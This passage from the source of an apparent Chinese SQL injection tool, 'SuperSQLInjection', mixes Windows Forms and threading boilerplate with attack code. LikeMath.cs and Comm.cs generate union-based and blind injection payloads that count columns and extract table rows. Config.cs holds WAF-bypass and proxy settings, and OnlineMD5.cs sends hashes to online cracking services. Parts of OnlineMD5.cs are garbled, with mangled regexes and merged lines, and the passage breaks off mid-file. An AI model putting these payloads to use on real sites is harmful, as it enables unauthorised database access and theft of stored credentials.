54 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
55 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
56 | this.ClientSize = new System.Drawing.Size(266, 64);
57 | this.Controls.Add(this.txt_node_text);
58 | this.Controls.Add(this.btn_addNode);
59 | this.Name = "AddNode";
60 | this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
61 | this.Text = "AddNode";
62 | this.ResumeLayout(false);
63 | this.PerformLayout();
64 |
65 | }
66 |
67 | #endregion
68 |
69 | private System.Windows.Forms.Button btn_addNode;
70 | private System.Windows.Forms.TextBox txt_node_text;
71 | }
72 | }
--------------------------------------------------------------------------------
/SuperSQLInjection/Properties/app.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
47 |
54 |
55 |
69 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/EventWaitHandleFactory.cs:
--------------------------------------------------------------------------------
1 | using System.Threading;
2 |
3 | #if (_WINDOWS_CE)
4 | using System;
5 | using System.Runtime.InteropServices;
6 | #endif
7 |
8 | namespace Amib.Threading.Internal
9 | {
10 | ///
11 | /// EventWaitHandleFactory class.
12 | /// This is a static class that creates AutoResetEvent and ManualResetEvent objects.
13 | /// In WindowCE the WaitForMultipleObjects API fails to use the Handle property
14 | /// of XxxResetEvent. It can use only handles that were created by the CreateEvent API.
15 | /// Consequently this class creates the needed XxxResetEvent and replaces the handle if
16 | /// it's a WindowsCE OS.
17 | ///
18 | public static class EventWaitHandleFactory
19 | {
20 | ///
21 | /// Create a new AutoResetEvent object
22 | ///
23 | /// Return a new AutoResetEvent object
24 | public static AutoResetEvent CreateAutoResetEvent()
25 | {
26 | AutoResetEvent waitHandle = new AutoResetEvent(false);
27 |
28 | #if (_WINDOWS_CE)
29 | ReplaceEventHandle(waitHandle, false, false);
30 | #endif
31 |
32 | return waitHandle;
33 | }
34 |
35 | ///
36 | /// Create a new ManualResetEvent object
37 | ///
38 | /// Return a new ManualResetEvent object
39 | public static ManualResetEvent CreateManualResetEvent(bool initialState)
40 | {
41 | ManualResetEvent waitHandle = new ManualResetEvent(initialState);
42 |
43 | #if (_WINDOWS_CE)
44 | ReplaceEventHandle(waitHandle, true, initialState);
45 | #endif
46 |
47 | return waitHandle;
48 | }
49 |
50 | #if (_WINDOWS_CE)
51 |
52 | ///
53 | /// Replace the event handle
54 | ///
55 | /// The WaitHandle object which its handle needs to be replaced.
56 | /// Indicates if the event is a ManualResetEvent (true) or an AutoResetEvent (false)
57 | /// The initial state of the event
58 | private static void ReplaceEventHandle(WaitHandle waitHandle, bool manualReset, bool initialState)
59 | {
60 | // Store the old handle
61 | IntPtr oldHandle = waitHandle.Handle;
62 |
63 | // Create a new event
64 | IntPtr newHandle = CreateEvent(IntPtr.Zero, manualReset, initialState, null);
65 |
66 | // Replace the old event with the new event
67 | waitHandle.Handle = newHandle;
68 |
69 | // Close the old event
70 | CloseHandle (oldHandle);
71 | }
72 |
73 | [DllImport("coredll.dll", SetLastError = true)]
74 | public static extern IntPtr CreateEvent(IntPtr lpEventAttributes, bool bManualReset, bool bInitialState, string lpName);
75 |
76 | //Handle
77 | [DllImport("coredll.dll", SetLastError = true)]
78 | public static extern bool CloseHandle(IntPtr hObject);
79 | #endif
80 |
81 | }
82 | }
83 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/LikeMath.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SuperSQLInjection.tools
6 | {
7 | public class LikeMath
8 | {
9 | /// vers = null;
10 | //获取数据条数
11 | public static String data_count = "(select count(1) from {table})";
12 |
13 | //判断条数
14 | public static String bool_datas_count = " " + data_count + ">={len}";
15 |
16 | public static String substr = "mid(({data}),{index},1)";
17 |
18 | //bool方式字符长度判断
19 | public static String bool_length = " len({data})>{len}";
20 |
21 | public static String bool_value = " {data}>{len}";
22 |
23 | //获取行数据
24 | public static String data_value = "(select top 1 {data} from (select top {index} {allcolumns} from {table} order by {orderby} asc) t order by t.{orderby} desc)";
25 |
26 | //union获取值
27 | public static String union_value = " and 1=2 union all select {data} from {table}";
28 |
29 | //多字符
30 | public static String unicode_value = "ascw(mid({data},{index},1))";
31 |
32 |
33 | public static String getUnionDataValue(int columnsLen, int showIndex,String Fill,List columns, String table, String index)
34 | {
35 | StringBuilder sb = new StringBuilder();
36 | String data = "chr(94)&chr(94)&chr(33)&" + Comm.unionColumns(columns, "&chr(36)&chr(36)&chr(36)&") + "&chr(33)&chr(94)&chr(94)";
37 | for (int i = 1; i <= columnsLen; i++)
38 | {
39 | if (i == showIndex)
40 | {
41 | sb.Append(data_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{table}", table).Replace("{index}", index).Replace("{orderby}", columns[0]));
42 | sb.Append(",");
43 | }
44 | else
45 | {
46 | sb.Append(Fill+",");
47 | }
48 | }
49 | sb.Remove(sb.Length - 1, 1);
50 | return union_value.Replace("{data}", sb.ToString());
51 | }
52 |
53 |
54 | public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, String dataPayLoad)
55 | {
56 | StringBuilder sb = new StringBuilder();
57 | for (int i = 1; i <= columnsLen; i++)
58 | {
59 | if (i == showIndex)
60 | {
61 | sb.Append("(chr(94)&chr(94)&chr(33)&" + dataPayLoad + "&chr(33)&chr(94)&chr(94)),");
62 | }
63 | else
64 | {
65 | sb.Append(Fill + ",");
66 | }
67 | }
68 | sb.Remove(sb.Length - 1, 1);
69 | return union_value.Replace("{data}", sb.ToString());
70 | }
71 | public static String getBoolDataPayLoad(String column,List columns,String dbName, String table, int index)
72 | {
73 | String data = data_value.Replace("{data}",column).Replace("{allcolumns}",Comm.unionColumns(columns,",")).Replace("{orderby}",columns[0]);
74 | String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{data}", column).Replace("{index}", index.ToString());
75 | return payload;
76 | }
77 |
78 |
79 | }
80 | }
81 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/ListViewColumnSorter.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections;
3 | using System.Collections.Generic;
4 | using System.Text;
5 | using System.Windows.Forms;
6 |
7 | namespace SuperSQLInjection.tools
8 | {
9 | class ListViewColumnSorter:IComparer
10 | {
11 | /**/
12 | ///
13 | /// 指定按照哪个列排序
14 | ///
15 | private int ColumnToSort;
16 | /**/
17 | ///
18 | /// 指定排序的方式
19 | ///
20 | public SortOrder OrderOfSort;
21 | /**/
22 | ///
23 | /// 声明CaseInsensitiveComparer类对象,
24 | /// 参见ms-help://MS.VSCC.2003/MS.MSDNQTR.2003FEB.2052/cpref/html/frlrfSystemCollectionsCaseInsensitiveComparerClassTopic.htm
25 | ///
26 | private CaseInsensitiveComparer ObjectCompare;
27 |
28 | /**/
29 | ///
30 | /// 构造函数
31 | ///
32 | public ListViewColumnSorter()
33 | {
34 | // 默认按第一列排序
35 | ColumnToSort = 0;
36 |
37 | // 排序方式为不排序
38 | OrderOfSort = SortOrder.None;
39 |
40 | // 初始化CaseInsensitiveComparer类对象
41 | ObjectCompare = new CaseInsensitiveComparer();
42 | }
43 |
44 | /**/
45 | ///
46 | /// 重写IComparer接口.
47 | ///
48 | /// 要比较的第一个对象
49 | /// 要比较的第二个对象
50 | /// 比较的结果.如果相等返回0,如果x大于y返回1,如果x小于y返回-1
51 | public int Compare(object x, object y)
52 | {
53 | int compareResult;
54 | ListViewItem listviewX, listviewY;
55 |
56 | // 将比较对象转换为ListViewItem对象
57 | listviewX = (ListViewItem)x;
58 | listviewY = (ListViewItem)y;
59 |
60 | // 比较
61 | compareResult = new MyCopare().Compare(listviewX.SubItems[ColumnToSort].Text, listviewY.SubItems[ColumnToSort].Text);
62 |
63 | // 根据上面的比较结果返回正确的比较结果
64 | if (OrderOfSort == SortOrder.Ascending)
65 | {
66 | // 因为是正序排序,所以直接返回结果
67 | return compareResult;
68 | }
69 | else if (OrderOfSort == SortOrder.Descending)
70 | {
71 | // 如果是反序排序,所以要取负值再返回
72 | return (-compareResult);
73 | }
74 | else
75 | {
76 | // 如果相等返回0
77 | return 0;
78 | }
79 | }
80 |
81 | /**/
82 | ///
83 | /// 获取或设置按照哪一列排序.
84 | ///
85 | public int SortColumn
86 | {
87 | set
88 | {
89 | ColumnToSort = value;
90 | }
91 | get
92 | {
93 | return ColumnToSort;
94 | }
95 | }
96 |
97 | /**/
98 | ///
99 | /// 获取或设置排序方式.
100 | ///
101 | public SortOrder Order
102 | {
103 | set
104 | {
105 | OrderOfSort = value;
106 | }
107 | get
108 | {
109 | return OrderOfSort;
110 | }
111 | }
112 | }
113 | }
114 |
115 |
--------------------------------------------------------------------------------
/SuperSQLInjection/model/Config.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 | using System.Collections;
5 |
6 | namespace SuperSQLInjection.model
7 | {
8 | [Serializable]
9 | public class Config
10 | {
11 | public Config() {
12 |
13 | }
14 | public String saveConfigpath = "";
15 | public String time = "";
16 | public String domain = "";
17 | public String uri = "";//注入URI
18 | public String pname = "";//当前注入参数
19 | public String testPayload = "";//注入测试payload
20 | public int port = 80;
21 | public int maxTime = 5 ;//延时注入判断阀值
22 | public InjectType injectType=new InjectType();
23 | public DBType dbType = new DBType();
24 | public int timeOut = 10;//秒
25 | public int threadSize = 1;
26 | public int reTry = 2;
27 | public String encoding = "UTF-8";
28 | public String cmd_encoding = "UTF-8";
29 | public String request = "";
30 | public String sencondRequest = "";
31 | public String key = "";
32 | public int injectHTTPCode = 0;//注入逻辑为真的时候页面的状态码
33 | public String db_encoding = "UTF-8";
34 | public Boolean useCode = false;
35 | public int columnsCount = 0;
36 |
37 | public String unionFillTemplate = "";//DB2填充模板
38 |
39 | public Boolean sencondInject = false;//二次注入
40 | public int showColumn = 0;
41 | public Boolean reverseKey = false;//反取关键字
42 | public KeyType keyType = KeyType.Key;//判断类型,可以盲注以关键字或时间判断
43 | public Boolean isMuStr = true;//开启多字节字符
44 | public Boolean is_foward_302 = false;
45 | public Boolean isOpenInfoLog=true;//开启底部日志
46 | public Boolean isOpenHTTPLog = true;//开启HTTP日志
47 | public Boolean isAutoCheckUpdate = true;//自动检查更新
48 | public Boolean isSavaConfigWhenClose = true;//自动保存配置
49 | public Boolean useSSL = false;//ssl
50 | public Boolean isOpenURLEncoding = true;//开启URL编码
51 | public Boolean redirectDoGet = false;//重定向使用的请求方法
52 | public int maxClolumns = 50;
53 | public int urlencodeCount = 1;//url编码次数
54 | public String unionFill = "1";//union查询填充列
55 | //token
56 | public String token_request = "";//获取token的request
57 | public String token_startStr = "";//获取token的开始字符
58 | public String token_endStr = "";//获取token的结束字符
59 |
60 |
61 | //file
62 | public String readFileEncoding = "GBK";
63 |
64 | //cmd
65 | public Boolean showCmdResult = true;
66 |
67 | //bypass
68 | public Boolean reaplaceBeforURLEncode = true;//是否在URL编码前处理bypass字符
69 | public Boolean inculdeStr = false;
70 | public int keyReplace = 0;
71 | public String randIPToHeader = "";
72 | public int sendHTTPSleepTime = 0;
73 | public String replaceStrs="";//字符替换
74 | public int base64Count = 0;
75 | public Boolean useBetweenByPass = false;//between绕过
76 | public Boolean usehex = false;//hex绕过
77 | public Boolean useUnicode = false;//uniocde绕过
78 | public String retryKey = "";//重新发包的关键字
79 | //scan
80 | public int level = 0;
81 | public int linkCount = 1;
82 | public int maxSpiderCount=10;
83 | public int maxScanCount = 10;
84 |
85 | //proxy
86 | public int proxy_mode = 0;//0关闭代理,1随机代理,2固定代理
87 | public String proxy_check_host = "www.baidu.com";
88 | public int proxy_check_port = 80;
89 | public String proxy_check_Keys = "百度一下,你就知道";
90 | }
91 | }
92 |
--------------------------------------------------------------------------------
/SuperSQLInjection/payload/Comm.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 | using tools;
5 |
6 | namespace SuperSQLInjection.payload
7 | {
8 | class Comm
9 | {
10 |
11 | public const String COLUMNS_SPLIT_STR = "$\t$";
12 | public const String COLUMNS_REG_SPLIT_STR = "\\$\\t\\$|\\$\\\\t\\$";
13 |
14 | public static String COLUMNS_SPLIT_HEX_STR = Tools.strToHex(COLUMNS_SPLIT_STR, "UTF-8");
15 | public static String exists_table = " exists(select 1 from {0})";
16 | public static String exists_column = " exists(select {0} from {1})";
17 | public static String truePayload = " 1=1";
18 | public static String falsePayload = " 1=2";
19 |
20 | public static String unionColumns(List columns, String unionStr)
21 | {
22 | StringBuilder sb = new StringBuilder();
23 | foreach (String column in columns)
24 | {
25 | sb.Append(column + unionStr);
26 | }
27 | sb.Remove(sb.Length - unionStr.Length, unionStr.Length);
28 | return sb.ToString();
29 | }
30 |
31 |
32 | public static String unionColumnCountTest(int maxColumn,String fill)
33 | {
34 | StringBuilder sb = new StringBuilder(" 1=2 union all select ");
35 | for (int i = 1; i <= maxColumn;i++ )
36 | {
37 | sb.Append(fill+"+"+i+",");
38 | }
39 | sb.Remove(sb.Length - 1, 1);
40 | return sb.ToString();
41 | }
42 |
43 | public static String unionColumnCountTestByOracle(int maxColumn, String fill)
44 | {
45 | StringBuilder sb = new StringBuilder(" 1=2 union all select ");
46 | for (int i = 1; i <= maxColumn; i++)
47 | {
48 | sb.Append(fill + ",");
49 | }
50 | sb.Remove(sb.Length - 1, 1);
51 | return sb.ToString()+" from dual";
52 | }
53 |
54 | public static String unionColumnCountTestByOracle(int maxColumn,int testIndex,String fill)
55 | {
56 |
57 | return unionColumnCountTest(maxColumn,testIndex,fill) + " from dual";
58 | }
59 |
60 | public static String unionColumnCountTestByDB2(String unionTempaldate, String fill)
61 | {
62 | StringBuilder sb = new StringBuilder(" 1=2 union all select ");
63 | sb.Append(unionTempaldate.Replace("{data}", fill));
64 | sb.Append(" from sysibm.sysdummy1");
65 | return sb.ToString();
66 | }
67 |
68 | public static String unionColumnCountTestByInformix(String unionTempaldate, String fill)
69 | {
70 | StringBuilder sb = new StringBuilder(" 1=2 union all select ");
71 | sb.Append(unionTempaldate.Replace("{data}", fill));
72 | sb.Append(" from sysmaster:sysdual");
73 | return sb.ToString();
74 | }
75 |
76 |
77 | public static String unionColumnCountTest(int maxColumn, int testIndex, String fill)
78 | {
79 | StringBuilder sb = new StringBuilder(" 1=2 union all select ");
80 | for (int i = 1; i <= maxColumn; i++)
81 | {
82 | if (i == testIndex)
83 | {
84 | sb.Append(fill + ",");
85 | }
86 | else
87 | {
88 | sb.Append("null" + ",");
89 | }
90 | }
91 | sb.Remove(sb.Length - 1, 1);
92 | return sb.ToString();
93 | }
94 |
95 |
96 |
97 | }
98 | }
99 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/EventWaitHandle.cs:
--------------------------------------------------------------------------------
1 | #if (_WINDOWS_CE)
2 |
3 | using System;
4 | using System.Runtime.InteropServices;
5 | using System.Threading;
6 |
7 | namespace Amib.Threading.Internal
8 | {
9 | ///
10 | /// EventWaitHandle class
11 | /// In WindowsCE this class doesn't exist and I needed the WaitAll and WaitAny implementation.
12 | /// So I wrote this class to implement these two methods with some of their overloads.
13 | /// It uses the WaitForMultipleObjects API to do the WaitAll and WaitAny.
14 | /// Note that this class doesn't even inherit from WaitHandle!
15 | ///
16 | public class STPEventWaitHandle
17 | {
18 | #region Public Constants
19 |
20 | public const int WaitTimeout = Timeout.Infinite;
21 |
22 | #endregion
23 |
24 | #region Private External Constants
25 |
26 | private const Int32 WAIT_FAILED = -1;
27 | private const Int32 WAIT_TIMEOUT = 0x102;
28 | private const UInt32 INFINITE = 0xFFFFFFFF;
29 |
30 | #endregion
31 |
32 | #region WaitAll and WaitAny
33 |
34 | internal static bool WaitOne(WaitHandle waitHandle, int millisecondsTimeout, bool exitContext)
35 | {
36 | return waitHandle.WaitOne(millisecondsTimeout, exitContext);
37 | }
38 |
39 | private static IntPtr[] PrepareNativeHandles(WaitHandle[] waitHandles)
40 | {
41 | IntPtr[] nativeHandles = new IntPtr[waitHandles.Length];
42 | for (int i = 0; i < waitHandles.Length; i++)
43 | {
44 | nativeHandles[i] = waitHandles[i].Handle;
45 | }
46 | return nativeHandles;
47 | }
48 |
49 | public static bool WaitAll(WaitHandle[] waitHandles, int millisecondsTimeout, bool exitContext)
50 | {
51 | uint timeout = millisecondsTimeout < 0 ? INFINITE : (uint)millisecondsTimeout;
52 |
53 | IntPtr[] nativeHandles = PrepareNativeHandles(waitHandles);
54 |
55 | int result = WaitForMultipleObjects((uint)waitHandles.Length, nativeHandles, true, timeout);
56 |
57 | if (result == WAIT_TIMEOUT || result == WAIT_FAILED)
58 | {
59 | return false;
60 | }
61 |
62 | return true;
63 | }
64 |
65 |
66 | public static int WaitAny(WaitHandle[] waitHandles, int millisecondsTimeout, bool exitContext)
67 | {
68 | uint timeout = millisecondsTimeout < 0 ? INFINITE : (uint)millisecondsTimeout;
69 |
70 | IntPtr[] nativeHandles = PrepareNativeHandles(waitHandles);
71 |
72 | int result = WaitForMultipleObjects((uint)waitHandles.Length, nativeHandles, false, timeout);
73 |
74 | if (result >= 0 && result < waitHandles.Length)
75 | {
76 | return result;
77 | }
78 |
79 | return -1;
80 | }
81 |
82 | public static int WaitAny(WaitHandle[] waitHandles)
83 | {
84 | return WaitAny(waitHandles, Timeout.Infinite, false);
85 | }
86 |
87 | public static int WaitAny(WaitHandle[] waitHandles, TimeSpan timeout, bool exitContext)
88 | {
89 | int millisecondsTimeout = (int)timeout.TotalMilliseconds;
90 |
91 | return WaitAny(waitHandles, millisecondsTimeout, false);
92 | }
93 |
94 | #endregion
95 |
96 | #region External methods
97 |
98 | [DllImport("coredll.dll", SetLastError = true)]
99 | public static extern int WaitForMultipleObjects(uint nCount, IntPtr[] lpHandles, bool fWaitAll, uint dwMilliseconds);
100 |
101 | #endregion
102 | }
103 | }
104 | #endif
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/encode/URLEncode.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 |
5 | namespace SuperSQLInjection.tools
6 | {
7 | class URLEncode
8 | {
9 |
10 | public static string UrlEncode(string sInput)
11 | {
12 | return UrlEncodeChars(sInput, Encoding.UTF8);
13 | }
14 | public static string UrlEncode(string sInput, Encoding oEnc)
15 | {
16 | return UrlEncodeChars(sInput, oEnc);
17 | }
18 | private static string UrlEncodeChars(string str, Encoding oEnc)
19 | {
20 | if (string.IsNullOrEmpty(str))
21 | {
22 | return str;
23 | }
24 | StringBuilder stringBuilder = new StringBuilder();
25 | for (int i = 0; i < str.Length; i++)
26 | {
27 | char c = str[i];
28 | if ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || c == '-' || c == '.' || c == '(' || c == ')' || c == '*' || c == '\'' || c == '_' || c == '!')
29 | {
30 | stringBuilder.Append(c);
31 | }
32 | else
33 | {
34 | byte[] bytes = oEnc.GetBytes(new char[]{c});
35 | byte[] array = bytes;
36 | for (int j = 0; j < array.Length; j++)
37 | {
38 | byte b = array[j];
39 | stringBuilder.Append("%");
40 | stringBuilder.Append(b.ToString("x2"));
41 | }
42 | }
43 | }
44 | return stringBuilder.ToString();
45 | }
46 | // Fiddler.Utilities
47 | public static string UrlPathEncode(string str)
48 | {
49 | if (string.IsNullOrEmpty(str))
50 | {
51 | return str;
52 | }
53 | int num = str.IndexOf('?');
54 | if (num >= 0)
55 | {
56 | return UrlPathEncode(str.Substring(0, num)) + str.Substring(num);
57 | }
58 | return UrlPathEncodeChars(str);
59 | }
60 |
61 | private static string UrlPathEncodeChars(string str)
62 | {
63 | if (string.IsNullOrEmpty(str))
64 | {
65 | return str;
66 | }
67 | StringBuilder stringBuilder = new StringBuilder();
68 | for (int i = 0; i < str.Length; i++)
69 | {
70 | char c = str[i];
71 | if (c > ' ' && c < '\u007f')
72 | {
73 | stringBuilder.Append(c);
74 | }
75 | else
76 | {
77 | if (c < '!')
78 | {
79 | stringBuilder.Append("%");
80 | stringBuilder.Append(((byte)c).ToString("X2"));
81 | }
82 | else
83 | {
84 | byte[] bytes = Encoding.UTF8.GetBytes(new char[]
85 | {
86 | c
87 | });
88 | byte[] array = bytes;
89 | for (int j = 0; j < array.Length; j++)
90 | {
91 | byte b = array[j];
92 | stringBuilder.Append("%");
93 | stringBuilder.Append(b.ToString("X2"));
94 | }
95 | }
96 | }
97 | }
98 | return stringBuilder.ToString();
99 | }
100 | }
101 | }
102 |
--------------------------------------------------------------------------------
/SuperSQLInjection/FindString.Designer.cs:
--------------------------------------------------------------------------------
1 | namespace SuperSQLInjection
2 | {
3 | partial class FindString
4 | {
5 | ///
6 | /// Required designer variable.
7 | ///
8 | private System.ComponentModel.IContainer components = null;
9 |
10 | ///
11 | /// Clean up any resources being used.
12 | ///
13 | /// true if managed resources should be disposed; otherwise, false.
14 | protected override void Dispose(bool disposing)
15 | {
16 | if (disposing && (components != null))
17 | {
18 | components.Dispose();
19 | }
20 | base.Dispose(disposing);
21 | }
22 |
23 | #region Windows Form Designer generated code
24 |
25 | ///
26 | /// Required method for Designer support - do not modify
27 | /// the contents of this method with the code editor.
28 | ///
29 | private void InitializeComponent()
30 | {
31 | this.btn_find = new System.Windows.Forms.Button();
32 | this.txt_key = new System.Windows.Forms.TextBox();
33 | this.label1 = new System.Windows.Forms.Label();
34 | this.label2 = new System.Windows.Forms.Label();
35 | this.SuspendLayout();
36 | //
37 | // btn_find
38 | //
39 | this.btn_find.Location = new System.Drawing.Point(279, 17);
40 | this.btn_find.Name = "btn_find";
41 | this.btn_find.Size = new System.Drawing.Size(75, 23);
42 | this.btn_find.TabIndex = 0;
43 | this.btn_find.Text = "查找";
44 | this.btn_find.UseVisualStyleBackColor = true;
45 | this.btn_find.Click += new System.EventHandler(this.btn_find_Click);
46 | //
47 | // txt_key
48 | //
49 | this.txt_key.Location = new System.Drawing.Point(83, 19);
50 | this.txt_key.Name = "txt_key";
51 | this.txt_key.Size = new System.Drawing.Size(112, 21);
52 | this.txt_key.TabIndex = 1;
53 | this.txt_key.TextChanged += new System.EventHandler(this.txt_key_TextChanged);
54 | //
55 | // label1
56 | //
57 | this.label1.AutoSize = true;
58 | this.label1.Location = new System.Drawing.Point(12, 22);
59 | this.label1.Name = "label1";
60 | this.label1.Size = new System.Drawing.Size(65, 12);
61 | this.label1.TabIndex = 2;
62 | this.label1.Text = "查找字符:";
63 | //
64 | // label2
65 | //
66 | this.label2.AutoSize = true;
67 | this.label2.Location = new System.Drawing.Point(201, 22);
68 | this.label2.Name = "label2";
69 | this.label2.Size = new System.Drawing.Size(47, 12);
70 | this.label2.TabIndex = 2;
71 | this.label2.Text = "匹配:0";
72 | //
73 | // FindString
74 | //
75 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
76 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
77 | this.ClientSize = new System.Drawing.Size(370, 61);
78 | this.Controls.Add(this.label2);
79 | this.Controls.Add(this.label1);
80 | this.Controls.Add(this.txt_key);
81 | this.Controls.Add(this.btn_find);
82 | this.MaximizeBox = false;
83 | this.MinimizeBox = false;
84 | this.Name = "FindString";
85 | this.ShowIcon = false;
86 | this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen;
87 | this.Text = "查找字符";
88 | this.ResumeLayout(false);
89 | this.PerformLayout();
90 |
91 | }
92 |
93 | #endregion
94 |
95 | private System.Windows.Forms.Button btn_find;
96 | private System.Windows.Forms.TextBox txt_key;
97 | private System.Windows.Forms.Label label1;
98 | private System.Windows.Forms.Label label2;
99 | }
100 | }
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/OnlineMD5.cs:
--------------------------------------------------------------------------------
1 | using model;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Net;
5 | using System.Text;
6 | using System.Text.RegularExpressions;
7 |
8 | namespace SuperSQLInjection.tools
9 | {
10 | class OnlineMD5
11 | {
12 |
13 | public static String decodeMD5_cmd5(String md5){
14 | ServerInfo server_index=HTTPRequest.getHtml("http://www.cmd5.com/",null,null);
15 | String VIEWSTATE = Regex.Match(server_index.body, "VIEWSTATE\" value=\"(?\\S+)\"").Groups["result"].Value;
16 |
17 | String data = "__VIEWSTATE=" + VIEWSTATE + "&ctl00%24ContentPlaceHolder1%24TextBoxInput=" + md5 + "&ctl00%24ContentPlaceHolder1%24InputHashType=md5&ctl00%24ContentPlaceHolder1%24Button1=%E8%A7%A3%E5%AF%86";
18 | ServerInfo server_result = HTTPRequest.getHtmlByPost("http://www.cmd5.com", data, "http://www.cmd5.com/", server_index.cookies);
19 | String result = Regex.Match(server_result.body, "Answer\">(?\\S+)\\S+)\"").Groups["result"].Value;
29 | String sand = Regex.Match(server_index.body, "sand\" value=\"(?\\S+)\"").Groups["result"].Value;
30 | if (token.Length > 1) {
31 |
32 | ServerInfo server_result = HTTPRequest.getHtmlByPost("http://www.md5.com.cn/md5reverse", "md=" + md5 + "&sand=" + sand + "&token=" + token + "&submit=MD5+Crack", "http://www.md5.com.cn/", server_index.cookies);
33 | String result = Regex.Match(server_result.body, "green\">(?\\S+)").Groups["result"].Value;
34 | return result;
35 | }
36 | return "接口异常";
37 |
38 | }
39 | public static String decodeMD5_xmd5_org(String md5)
40 | {
41 |
42 | ServerInfo server_index = HTTPRequest.getHtml("http://www.xmd5.org", null, null);
43 |
44 | ServerInfo server_result = HTTPRequest.getHtml("http://www.xmd5.org/md5/search.asp?hash="+md5+"&xmd5=MD5+%BD%E2%C3%DC", "http://www.xmd5.org/", server_index.cookies);
45 | String result = Regex.Match(server_result.body, "ff\" size=\"3\">(?\\S+) ").Groups["result"].Value;
46 | return result;
47 | }
48 |
49 | public static String decodeMD5_somd5_com(String md5)
50 | {
51 |
52 | ServerInfo server_result = HTTPRequest.getHtmlByPost("http://www.somd5.com/somd5-index-md5.html", "isajax=sJUVsBd1XOzFDPynHEfSnSt&md5=" + md5, "http://www.somd5.com/", null);
53 | String result = Regex.Match(server_result.body, "inline;\">(?\\S+)").Groups["result"].Value;
54 | return result;
55 | }
56 | public static String decodeMD5_md5_cc(String md5)
57 | {
58 |
59 | ServerInfo server_result = HTTPRequest.getHtml("http://www.md5.cc/ShowMD5Info.asp?GetType=ShowInfo&md5_str="+md5, "http://www.md5.cc/", null);
60 | String result = Regex.Match(server_result.body, "px\">(?\\S+)").Groups["result"].Value;
61 | return result;
62 | }
63 |
64 | public static String decodeMD5_pmd5_com(String md5)
65 | {
66 | ServerInfo server_index = HTTPRequest.getHtml("http://pmd5.com/", null, null);
67 | String VIEWSTATE = Regex.Match(server_index.body, "VIEWSTATE\" value=\"(?\\S+)\"").Groups["result"].Value;
68 | String EVENTVALIDATION = Regex.Match(server_index.body, "EVENTVALIDATION\" value=\"(?\\S+)\"").Groups["result"].Value;
69 |
70 | String data = "__VIEWSTATE=" + VIEWSTATE + "&__EVENTVALIDATION=" + EVENTVALIDATION + "&key=" + md5 + "&jiemi=MD5%E8%A7%A3%E5%AF%86";
71 | ServerInfo server_result = HTTPRequest.getHtmlByPost("http://pmd5.com/?action=getpwd", data, "http://pmd5.com/", server_index.cookies);
72 | String result = Regex.Match(server_result.body, "为“(?\\S+)").Groups["result"].Value;
73 | return result;
74 |
75 | }
76 | }
77 | }
78 |
--------------------------------------------------------------------------------
/SuperSQLInjection/Seting.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.ComponentModel;
4 | using System.Data;
5 | using System.Drawing;
6 | using System.Text;
7 | using System.Windows.Forms;
8 | using tools;
9 |
10 | namespace SuperSQLInjection
11 | {
12 | public partial class Seting : Form
13 | {
14 | public Seting(Main main)
15 | {
16 | InitializeComponent();
17 | this.main = main;
18 | }
19 |
20 | private Main main = null;
21 |
22 | private void chk_mysqlMuStr_CheckedChanged(object sender, EventArgs e)
23 | {
24 | main.config.isMuStr = this.chk_mysqlMuStr.Checked;
25 | }
26 |
27 | private void chk_openInfoLog_CheckedChanged(object sender, EventArgs e)
28 | {
29 | main.config.isOpenInfoLog = this.chk_openInfoLog.Checked;
30 | }
31 |
32 | private void chk_openHTTPLog_CheckedChanged(object sender, EventArgs e)
33 | {
34 | main.config.isOpenHTTPLog = this.chk_openHTTPLog.Checked;
35 | }
36 |
37 | private void chk_autoCheckUpdate_CheckedChanged(object sender, EventArgs e)
38 | {
39 | main.config.isAutoCheckUpdate = this.chk_autoCheckUpdate.Checked;
40 | }
41 |
42 |
43 |
44 | private void chk_isAutoSaveConfig_CheckedChanged(object sender, EventArgs e)
45 | {
46 | main.config.isSavaConfigWhenClose = this.chk_isAutoSaveConfig.Checked;
47 | }
48 |
49 | private void Seting_Shown(object sender, EventArgs e)
50 | {
51 | this.chk_openHTTPLog.Checked = main.config.isOpenHTTPLog;
52 | this.chk_openInfoLog.Checked = main.config.isOpenInfoLog;
53 | this.chk_mysqlMuStr.Checked = main.config.isMuStr;
54 | this.chk_autoCheckUpdate.Checked = main.config.isAutoCheckUpdate;
55 | this.chk_isAutoSaveConfig.Checked = main.config.isSavaConfigWhenClose;
56 | this.cmb_maxClolumnsCount.Text = main.config.maxClolumns.ToString();
57 | this.cmb_oneDomainMaxSpiderCount.Text = main.config.maxSpiderCount.ToString();
58 | this.cmb_oneDomainMaxScanCount.Text = main.config.maxScanCount.ToString();
59 | this.chk_redirectDoGet.Checked=main.config.redirectDoGet;
60 | this.cmb_unionFill.Text = main.config.unionFill;
